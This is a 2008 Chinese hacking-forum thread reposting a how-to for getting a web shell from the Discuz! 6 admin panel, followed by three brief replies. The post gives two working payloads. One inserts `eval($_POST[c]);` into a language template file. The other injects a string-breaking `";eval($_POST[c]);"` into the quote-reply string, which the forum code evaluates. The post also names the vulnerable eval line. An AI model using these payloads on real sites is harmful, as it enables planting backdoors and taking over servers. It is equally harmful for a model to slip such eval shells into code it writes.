Board logo

标题: [转载]Discuz! 6 后台拿Shell的方法 [打印本页]

作者: 柔肠寸断    时间: 2008-8-11 23:10     标题: [转载]Discuz! 6 后台拿Shell的方法

[转载]Discuz! 6 后台拿Shell的方法文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:
复制内容到剪贴板
代码:
eval("\$language[&#39;post_reply_quote&#39;] = \"$language[post_reply_quote]\";");
呵呵,一个天然的后门:)
PS:还有几个编辑模板的地方可以利用,和第二种方法类似。
作者: 流氓    时间: 2008-8-12 03:15

学习!!
多实践!!!
努力!!
作者: 3ast    时间: 2008-8-12 16:44

楼上的在喊口号
作者: 闲逛    时间: 2009-1-7 11:31

.m (123). 现在好像被屏蔽了吧




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2